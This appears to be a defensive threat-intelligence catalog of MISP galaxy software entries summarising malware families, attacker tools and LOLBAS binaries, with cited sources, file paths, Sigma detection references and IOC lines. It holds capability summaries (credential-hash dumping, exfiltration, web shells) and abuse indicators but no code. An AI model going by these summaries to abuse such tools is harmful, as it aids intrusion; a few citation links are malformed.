<sup>[[Ldifde.exe - LOLBAS Project](/references/45d41df9-328c-4ea3-b0fb-fc9f43bdabe5)]</sup>

The tag is: misp-galaxy:software="Ldifde.exe - Associated Software"

Ldifde

Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".<sup>[[Ldifde Microsoft](/references/c47ed0e0-f3e3-41de-9ea7-64fe4e343d9d)]</sup>

The tag is: misp-galaxy:software="Ldifde"

LEMURLOOT

LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.<sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

Related Vulnerabilities: CVE-2023-34362<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup><sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

The tag is: misp-galaxy:software="LEMURLOOT"

Level.io - Associated Software

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Level.io - Associated Software"

Level Remote Management - Associated Software

<sup>[[Mandiant UNC3944 September 14 2023](/references/7420d79f-c6a3-4932-9c2e-c9cc36e2ca35)]</sup>

The tag is: misp-galaxy:software="Level Remote Management - Associated Software"

Level

According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Level"

LightNeuron

[LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) exists.<sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup>

The tag is: misp-galaxy:software="LightNeuron"

Ligolo

Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Ligolo"

Linfo

The tag is: misp-galaxy:software="Linfo"

Linux Rabbit

[Linux Rabbit](https://app.tidalcyber.com/software/d017e133-fce9-4982-a2df-6867a80089e7) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.<sup>[[Anomali Linux Rabbit 2018](https://app.tidalcyber.com/references/e843eb47-21b0-44b9-8065-02aea0a0b05f)]</sup>

The tag is: misp-galaxy:software="Linux Rabbit"

LitePower

[LitePower](https://app.tidalcyber.com/software/cc568409-71ff-468b-9c38-d0dd9020e409) is a downloader and second stage malware that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.<sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:software="LitePower"

Tirion - Associated Software

The tag is: misp-galaxy:software="Tirion - Associated Software"

Lizar

[Lizar](https://app.tidalcyber.com/software/65d46aab-b3ce-4f5b-b1fc-871db2573fa1) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d). It has likely been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least February 2021.<sup>[[BiZone Lizar May 2021](https://app.tidalcyber.com/references/315f47e1-69e5-4dcb-94b2-59583e91dd26)]</sup><sup>[[Threatpost Lizar May 2021](https://app.tidalcyber.com/references/1b89f62f-586d-4dee-b6dd-e5a5cd090a0e)]</sup><sup>[[Gemini FIN7 Oct 2021](https://app.tidalcyber.com/references/bbaef178-8577-4398-8e28-604faf0950b4)]</sup>

The tag is: misp-galaxy:software="Lizar"

LockBit Black - Associated Software

<sup>[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]</sup>

The tag is: misp-galaxy:software="LockBit Black - Associated Software"

LockBit 3.0

Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup> According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive" than previous LockBit strains.<sup>[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]</sup>

According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

Delivered By: Cobalt Strike<sup>[[Sentinel Labs LockBit 3.0 July 2022](/references/9a73b140-b483-4274-a134-ed1bb15ac31c)]</sup>, PsExec<sup>[[NCC Group Research Blog August 19 2022](/references/8c1fbe98-5fc1-4e67-9b96-b740ffc9b1ae)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/

The tag is: misp-galaxy:software="LockBit 3.0"

LockerGoga

[LockerGoga](https://app.tidalcyber.com/software/65bc8e81-0a08-49f6-9d04-a2d63d512342) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup><sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup>

The tag is: misp-galaxy:software="LockerGoga"

Rescue - Associated Software

The tag is: misp-galaxy:software="Rescue - Associated Software"

LogMeIn

LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.<sup>[[LogMeIn Homepage](/references/e113b544-82ad-4099-ab4e-7fc8b78f54bd)]</sup> Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.<sup>[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup><sup>[[CSRB LAPSUS$ July 24 2023](/references/f8311977-303c-4d05-a7f4-25b3ae36318b)]</sup>

The tag is: misp-galaxy:software="LogMeIn"

LoJax

The tag is: misp-galaxy:software="LoJax"

Lokibot

[Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) can also create a backdoor into infected systems to allow an attacker to install additional payloads.<sup>[[Infoblox Lokibot January 2019](https://app.tidalcyber.com/references/17ab0f84-a062-4c4f-acf9-e0b8f81c3cda)]</sup><sup>[[Morphisec Lokibot April 2020](https://app.tidalcyber.com/references/e938bab1-7dc1-4a78-b1e2-ab2aa0a83eb0)]</sup><sup>[[CISA Lokibot September 2020](https://app.tidalcyber.com/references/df979f7b-6de8-4029-ae47-700f29157db0)]</sup>

The tag is: misp-galaxy:software="Lokibot"

LookBack

[LookBack](https://app.tidalcyber.com/software/bfd2a077-5000-4500-82c4-5c85fb98dd5a) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack]([Proofpoint LookBack Malware Aug 2019(https://app.tidalcyber.com/references/77887f82-7815-4a91-8c8a-f77dc8a9ba53)]</sup><sup>[[Dragos TALONITE](https://app.tidalcyber.com/references/f8ef1920-a4ad-4d65-b9de-8357d75f6929)]</sup><sup>[[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]</sup>

The tag is: misp-galaxy:software="LookBack"

LostMyPassword

LostMyPassword is a tool used to recover passwords from Windows systems.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="LostMyPassword"

LoudMiner

[LoudMiner](https://app.tidalcyber.com/software/f503535b-406c-4e24-8123-0e22fec995bb) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.<sup>[[ESET LoudMiner June 2019](https://app.tidalcyber.com/references/f1e4ff9e-cb6c-46cc-898e-5f170bb5f634)]</sup>

The tag is: misp-galaxy:software="LoudMiner"

LOWBALL

[LOWBALL](https://app.tidalcyber.com/software/fce1117a-e699-4aef-b1fc-04c3967acc33) is malware used by [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:software="LOWBALL"

Lslsass

[Lslsass](https://app.tidalcyber.com/software/37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc) is a publicly-available tool that can dump active logon session password hashes from the lsass process. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Lslsass"

Lucifer

[Lucifer](https://app.tidalcyber.com/software/723d9a27-74fd-4333-a8db-63df2a8b4dd4) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.<sup>[[Unit 42 Lucifer June 2020](https://app.tidalcyber.com/references/3977a87a-2eab-4a67-82b2-10c9dc7e4554)]</sup>

The tag is: misp-galaxy:software="Lucifer"

Enfal - Associated Software

The tag is: misp-galaxy:software="Enfal - Associated Software"

Lurid

[Lurid](https://app.tidalcyber.com/software/0cc9e24b-d458-4782-a332-4e4fd68c057b) is a malware family that has been used by several groups, including [PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446), in targeted attacks as far back as 2006. <sup>[[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)]</sup> <sup>[[Villeneuve 2011](https://app.tidalcyber.com/references/ed5a2ec0-8328-40db-9f58-7eaac4ad39a0)]</sup>

The tag is: misp-galaxy:software="Lurid"

Pyark - Associated Software

The tag is: misp-galaxy:software="Pyark - Associated Software"

Machete

[Machete](https://app.tidalcyber.com/software/be8a1630-9562-41ad-a621-65989f961a10) is a cyber espionage toolset used by [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.<sup>[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)]</sup><sup>[[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)]</sup><sup>[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]</sup>

The tag is: misp-galaxy:software="Machete"

DazzleSpy - Associated Software

The tag is: misp-galaxy:software="DazzleSpy - Associated Software"

OSX.CDDS - Associated Software

The tag is: misp-galaxy:software="OSX.CDDS - Associated Software"

MacMa

[MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) has been observed in the wild since November 2021.<sup>[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]</sup>

The tag is: misp-galaxy:software="MacMa"

macOS.OSAMiner

[macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) may have been circulating since at least 2015. [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup><sup>[[VMRay OSAMiner dynamic analysis 2021](https://app.tidalcyber.com/references/47a5d32d-e6a5-46c2-898a-e45dc42371be)]</sup>

The tag is: misp-galaxy:software="macOS.OSAMiner"

MacSpy

[MacSpy](https://app.tidalcyber.com/software/e5e67c67-e658-45b5-850b-044312be4258) is a malware-as-a-service offered on the darkweb <sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>.

The tag is: misp-galaxy:software="MacSpy"

Mafalda

[Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) is a flexible interactive implant that has been used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b). Security researchers assess the [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. <sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup>

The tag is: misp-galaxy:software="Mafalda"

MailSniper

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.<sup>[[GitHub MailSniper](https://app.tidalcyber.com/references/50595548-b0c6-49d1-adab-43c8969ae716)]</sup>

The tag is: misp-galaxy:software="MailSniper"

Makecab.exe - Associated Software

<sup>[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]</sup>

The tag is: misp-galaxy:software="Makecab.exe - Associated Software"

Makecab

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to package existing files into a cabinet (.cab) file

Author: Oddvar Moe

Paths: * C:\Windows\System32\makecab.exe * C:\Windows\SysWOW64\makecab.exe

Detection: * Sigma: [proc_creation_win_susp_alternate_data_streams.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml) * Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml) * IOC: Makecab retrieving files from Internet * IOC: Makecab storing data into alternate data streams<sup>[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]</sup>

The tag is: misp-galaxy:software="Makecab"

Manage-bde.wsf - Associated Software

<sup>[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]</sup>

The tag is: misp-galaxy:software="Manage-bde.wsf - Associated Software"

Manage-bde

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script for managing BitLocker

Author: Oddvar Moe

Paths: * C:\Windows\System32\manage-bde.wsf

Detection: * Sigma: [proc_creation_win_lolbin_manage_bde.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml) * IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations<sup>[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]</sup>

The tag is: misp-galaxy:software="Manage-bde"

MarkiRAT

[MarkiRAT](https://app.tidalcyber.com/software/40806539-1496-4a64-b740-66f6a1467f40) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) since at least 2015.<sup>[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]</sup>

The tag is: misp-galaxy:software="MarkiRAT"

Matryoshka

[Matryoshka](https://app.tidalcyber.com/software/eeb700ea-2819-46f4-936d-f7592f20dedc) is a malware framework used by [CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. <sup>[[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)]</sup> <sup>[[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]</sup>

The tag is: misp-galaxy:software="Matryoshka"

Mavinject.exe - Associated Software

<sup>[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

The tag is: misp-galaxy:software="Mavinject.exe - Associated Software"

Mavinject

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by App-v in Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\mavinject.exe * C:\Windows\SysWOW64\mavinject.exe

Detection: * Sigma: [proc_creation_win_lolbin_mavinject_process_injection.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml) * IOC: mavinject.exe should not run unless APP-v is in use on the workstation<sup>[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

The tag is: misp-galaxy:software="Mavinject"

Maze

[Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.<sup>[[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)]</sup><sup>[[McAfee Maze March 2020](https://app.tidalcyber.com/references/627a14dd-5300-4f58-869c-0ec91ffb664e)]</sup><sup>[[Sophos Maze VM September 2020](https://app.tidalcyber.com/references/9c4bbcbb-2c18-453c-8b02-0a0cd512c3f3)]</sup>

The tag is: misp-galaxy:software="Maze"

MCMD

The tag is: misp-galaxy:software="MCMD"

MechaFlounder

[MechaFlounder](https://app.tidalcyber.com/software/31cbe3c8-be88-4a4f-891d-04c3bb7ed482) is a python-based remote access tool (RAT) that has been used by [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1). The payload uses a combination of actor developed code and code snippets freely available online in development communities.<sup>[[Unit 42 MechaFlounder March 2019](https://app.tidalcyber.com/references/2263af27-9c30-4bf6-a204-2f148ebdd17c)]</sup>

The tag is: misp-galaxy:software="MechaFlounder"

MedusaLocker Ransomware

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.<sup>[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/

The tag is: misp-galaxy:software="MedusaLocker Ransomware"

meek

[meek](https://app.tidalcyber.com/software/6c3bbcae-3217-43c7-b709-5c54bc7636b1) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: misp-galaxy:software="meek"

MegaCortex

[MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) is ransomware that first appeared in May 2019. <sup>[[IBM MegaCortex](https://app.tidalcyber.com/references/3d70d9b7-88e4-411e-a59a-bc862da965a7)]</sup> [MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) has mainly targeted industrial organizations. <sup>[[FireEye Ransomware Disrupt Industrial Production](https://app.tidalcyber.com/references/9ffa0f35-98e4-4265-8b66-9c805a2b6525)]</sup><sup>[[FireEye Financial Actors Moving into OT](https://app.tidalcyber.com/references/4bd514b8-1f79-4946-b001-110ce5cf29a9)]</sup>

The tag is: misp-galaxy:software="MegaCortex"

MEGAsync

A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.<sup>[[GitHub meganz MEGAsync](/references/6e59c47d-597c-4687-942f-9f1cf1db75d5)]</sup> Adversaries are known to abuse the tool for data exfiltration purposes.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="MEGAsync"

Melcoz

[Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Melcoz"

MESSAGETAP

[MESSAGETAP](https://app.tidalcyber.com/software/15d7e478-349d-42e6-802d-f16302b98319) is a data mining malware family deployed by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. <sup>[[FireEye MESSAGETAP October 2019](https://app.tidalcyber.com/references/f56380e8-3cfa-407c-a493-7f9e50ba3867)]</sup>

The tag is: misp-galaxy:software="MESSAGETAP"

metaMain

[metaMain](https://app.tidalcyber.com/software/0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d) is a backdoor used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) into memory.<sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup><sup>[[SentinelLabs Metador Technical Appendix Sept 2022](https://app.tidalcyber.com/references/aa021076-e9c5-5428-a938-c10cfb6b7c97)]</sup>

The tag is: misp-galaxy:software="metaMain"

Casbaneiro - Associated Software

The tag is: misp-galaxy:software="Casbaneiro - Associated Software"

Metamorfo

[Metamorfo](https://app.tidalcyber.com/software/ca607087-25ad-4a91-af83-608646cccbcb) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.<sup>[[Medium Metamorfo Apr 2020](https://app.tidalcyber.com/references/356defac-b976-41c1-aac8-5d6ff0c80e28)]</sup><sup>[[ESET Casbaneiro Oct 2019](https://app.tidalcyber.com/references/a5cb3ee6-9a0b-4e90-bf32-be7177a858b1)]</sup>

The tag is: misp-galaxy:software="Metamorfo"

Metasploit

The Metasploit Framework is an open-source software project that aids in penetration testing.<sup>[[Metasploit_Ref](/references/ab6ea6b3-3c71-4e69-9713-dae3e4446083)]</sup> The software is often abused by malicious actors to perform a range of post-exploitation activities.

The tag is: misp-galaxy:software="Metasploit"

Meteor

[Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.<sup>[[Check Point Meteor Aug 2021](https://app.tidalcyber.com/references/bb79207f-3ab4-4b86-8b1c-d587724efb7c)]</sup>

The tag is: misp-galaxy:software="Meteor"

Mftrace.exe - Associated Software

<sup>[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]</sup>

The tag is: misp-galaxy:software="Mftrace.exe - Associated Software"

Mftrace

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Trace log generation tool for Media Foundation Tools.

Author: Oddvar Moe

Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 * C:\Program Files (x86)\Windows Kits\10\bin\x86 * C:\Program Files (x86)\Windows Kits\10\bin\x64

Detection: * Sigma: [proc_creation_win_lolbin_mftrace.yml]([Mftrace.exe - LOLBAS Project(/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]</sup>

The tag is: misp-galaxy:software="Mftrace"

Micropsia

The tag is: misp-galaxy:software="Micropsia"

Microsoft.NodejsTools.PressAnyKey.exe - Associated Software

<sup>[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]</sup>

The tag is: misp-galaxy:software="Microsoft.NodejsTools.PressAnyKey.exe - Associated Software"

Microsoft.NodejsTools.PressAnyKey

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Part of the NodeJS Visual Studio tools.

Author: mr.d0x

Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe * C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe

Detection: * Sigma: [proc_creation_win_renamed_pressanykey.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml) * Sigma: [proc_creation_win_pressanykey_lolbin_execution.yml]([Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project(/references/25c46948-a648-4c3c-b442-e700df68fa20)]</sup>

The tag is: misp-galaxy:software="Microsoft.NodejsTools.PressAnyKey"

Microsoft.Workflow.Compiler.exe - Associated Software

